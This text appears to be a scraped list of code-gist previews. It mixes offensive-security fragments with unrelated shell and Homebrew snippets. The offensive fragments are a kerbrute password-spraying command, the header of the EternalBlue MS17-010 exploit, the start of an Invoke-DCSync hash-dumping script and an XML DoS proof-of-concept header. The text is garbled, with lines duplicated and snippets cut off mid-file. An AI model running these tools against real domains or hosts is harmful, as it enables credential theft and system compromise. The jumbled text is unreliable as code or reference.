With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
| import smtplib | |
| from email.mime.multipart import MIMEMultipart | |
| from email.mime.text import MIMEText | |
| from subprocess import check_output | |
| import datetime | |
| #Globals | |
| emailUsr = "" #sender email user name | |
| emailAddr = "" #sender email address | |
| emailPwd = "" #sender email password |
| ################################################################################# | |
| # CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS# | |
| # Author: Nir Goldshlager - Salesforce.com Product Security Team# | |
| # This is a Proof of Concept Exploit, Please use responsibly.# | |
| ################################################################################# | |
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import threading | |
| import time | |
| import urllib |
| # Test Internet Connection | |
| ping -c 1 google.com > /dev/null | |
| if [ "$?" != 0 ] | |
| then | |
| echo [*] [Internet Connection]: FAILED...; | |
| echo [x] [warning]:This Script Needs An Active Internet Connection; | |
| sleep 3 |
| diff --git a/Library/Formula/libdnet_python.rb b/Library/Formula/libdnet_python.rb | |
| new file mode 100644 | |
| index 0000000..31f0446 | |
| --- /dev/null | |
| +++ b/Library/Formula/libdnet_python.rb | |
| @@ -0,0 +1,18 @@ | |
| +require 'formula' | |
| + | |
| +class LibdnetPython <Formula | |
| + depends_on 'libdnet' |
| # Call virtualenvwrapper's "workon" if .venv exists. This is modified from-- | |
| # http://justinlilly.com/python/virtualenv_wrapper_helper.html | |
| # which is linked from-- | |
| # http://virtualenvwrapper.readthedocs.org/en/latest/tips.html#automatically-run-workon-when-entering-a-directory | |
| check_virtualenv() { | |
| if [ -e .venv ]; then | |
| env=`cat .venv` | |
| if [ "$env" != "${VIRTUAL_ENV##*/}" ]; then | |
| echo "Found .venv in directory. Calling: workon ${env}" | |
| workon $env |
| # Call virtualenvwrapper's "workon" if .venv exists. This is modified from-- | |
| # http://justinlilly.com/python/virtualenv_wrapper_helper.html | |
| # which is linked from-- | |
| # http://virtualenvwrapper.readthedocs.org/en/latest/tips.html#automatically-run-workon-when-entering-a-directory | |
| check_virtualenv() { | |
| if [ -e .venv ]; then | |
| env=`cat .venv` | |
| echo "Found .venv in directory. Calling: workon ${env}" | |
| workon $env | |
| fi |